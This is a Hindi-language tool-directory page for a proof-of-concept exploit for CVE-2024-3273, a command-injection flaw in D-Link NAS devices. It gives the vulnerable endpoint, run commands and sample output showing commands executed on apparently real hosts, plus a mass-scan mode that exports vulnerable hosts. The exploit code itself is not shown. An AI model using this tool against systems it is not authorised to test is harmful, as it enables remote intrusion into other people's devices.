Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3273 — CVE-2024-3273 के लिए शोषण, एकल और एकाधिक होस्ट का समर्थन करता है | Kitploit
उपकरण/GitHubGitHub/adhikara13/cve-2024-3273
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

CVE-2024-3273 के लिए शोषण, एकल और एकाधिक होस्ट का समर्थन करता है

रिपॉजिटरी देखें
13112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3273 प्रूफ ऑफ कॉन्सेप्ट (PoC)

इस रिपॉजिटरी में CVE-2024-3273 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो D-Link NAS उपकरणों में पाई गई एक सुरक्षा भेद्यता है। यह भेद्यता हमलावरों को असुरक्षित उपकरणों पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

विवरण

CVE-2024-3273 D-Link NAS उपकरणों में एक भेद्यता है, जो दूरस्थ हमलावरों को cgi-bin/nas_sharing.cgi एंडपॉइंट पर एक क्राफ्टेड HTTP अनुरोध के माध्यम से मनमाने कमांड निष्पादित करने की अनुमति देती है।

यह PoC दर्शाता है कि भेद्यता का उपयोग करके असुरक्षित D-Link NAS उपकरणों पर कमांड कैसे निष्पादित किए जा सकते हैं।

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी

उपयोग

  1. इस रिपॉजिटरी को क्लोन करें:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. रिपॉजिटरी निर्देशिका पर जाएँ:

    root@kitploit:~
    cd CVE-2024-3273
    
  • PoC चलाएँ:

    root@kitploit:~
    python main.py
    
  • लक्ष्य उपकरण चुनने के लिए ऑन-स्क्रीन निर्देशों का पालन करें:

    • विकल्प 1: एकल होस्ट (1): एकल लक्ष्य उपकरण के लिए विवरण दर्ज करें, जिसमें होस्ट IP पता और चलाने के लिए कमांड शामिल है।
    • विकल्प 2: एकाधिक होस्ट (2): host:port प्रारूप में कई लक्ष्य उपकरणों वाली एक फ़ाइल प्रदान करें, और चुनें कि क्या असुरक्षित होस्ट को vulnerables.txt में निर्यात करना है।
  • उदाहरण

    root@kitploit:~
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.
    

    अस्वीकरण

    यह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से करें और केवल उन उपकरणों पर करें जिनका परीक्षण करने के लिए आप अधिकृत हैं।

    योगदान

    योगदान का स्वागत है! यदि आपको कोई समस्या या सुधार मिलता है, तो बेझिझक एक issue खोलें या pull request बनाएं।

    टूल डाउनलोड करें